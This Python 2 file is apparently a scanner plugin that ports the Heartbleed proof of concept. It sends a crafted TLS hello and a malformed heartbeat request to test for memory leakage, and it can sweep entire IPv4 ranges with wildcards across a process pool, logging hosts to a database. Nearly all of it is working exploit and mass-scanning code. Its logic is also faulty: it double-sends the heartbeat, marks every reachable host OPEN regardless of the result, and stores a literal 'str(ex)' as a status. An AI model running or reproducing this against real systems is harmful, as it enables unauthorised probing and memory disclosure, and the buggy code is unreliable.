__author__ = 'asim jaweesh from owasp khartoum @asim_jaweesh' \
             'this is an ugly port, original hb code author disclaims copyright to this source code'

# The original author disclaims copyright to this source code.

import shlex
import signal
import socket
from datetime import datetime
import multiprocessing as multip
import errno
import struct
import time
import select



# heartbleed part



def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')


def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b: b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' ) for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print


def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay


def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            #hexdump(pay)
            if len(pay) > 3:
                print 'server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            #hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False


###########################

app = None

options = {}


def _scan(ipaddr, port=443):
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipaddr, port))
        s.send(hello)
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        #server is vulnerable
        s.send(hb)
        hit_hb(s)

        app.print_line("%s | %s | %d | OPEN" % (datetime.now(), ipaddr, port))
        host = app.db.Host.add(app.db.get_session(), hostip=ipaddr, hostname='')
        app.db.Port.add(app.db.get_session(), protocol='TCP', port_number=port, status='open', hostid=ipaddr)
    except IOError, ex:
        if ex.errno != errno.EINTR:
            app.print_line("%s | %s | %d | ERROR | %r" % (datetime.now(), ipaddr, port, str(ex)))
            host = app.db.Host.add(app.db.get_session(), hostip=ipaddr, hostname='')
            app.db.Port.add(app.db.get_session(), protocol='TCP', port_number=port, status='str(ex)', hostid=ipaddr)
    finally:
        if s:
            try:
                s.shutdown(socket.SHUT_WR)
            except IOError:
                pass
            finally:
                s.close()


def do_scan(args):
    fields = shlex.split(args.strip().lower())
    if not fields:
        app.print_line("Error: ip address expected")
        return -1
    ps = fields[0].strip().lower().split('.')
    if len(ps) != 4 or not all(((p.isdigit() and 0 <= int(p) < 256) or p == 'x') for p in ps):
        app.print_line("Error: invalid IPv4 address %r" % fields[0])
        return -1
    if len(fields) > 1:
        port = fields[1]
        if not port.isdigit() and not int(port) < 0:
            app.print_line("Error: invalid port %r" % port)
        port = int(port)
    else:
        port = 80

    def init_work(*_):
        signal.signal(signal.SIGINT, signal.SIG_IGN)

    pool = multip.Pool(processes=5, initializer=init_work)
    jobs = []
    #
    try:
        for a in (xrange(0, 256) if ps[0] == 'x' else (int(ps[0]),)):
            for b in (xrange(0, 256) if ps[1] == 'x' else (int(ps[1]),)):
                for c in (xrange(0, 256) if ps[2] == 'x' else (int(ps[2]),)):
                    for d in (xrange(0, 256) if ps[3] == 'x' else (int(ps[3]),)):
                        ipaddr = '%d.%d.%d.%d' % (a, b, c, d)
                        j = pool.apply_async(_scan, (ipaddr, port))
                        jobs.append(j)
        for j in jobs:
            j.get()
    except KeyboardInterrupt:
        pool.terminate()
        pool.join()
    else:
        pool.close()
        pool.join()
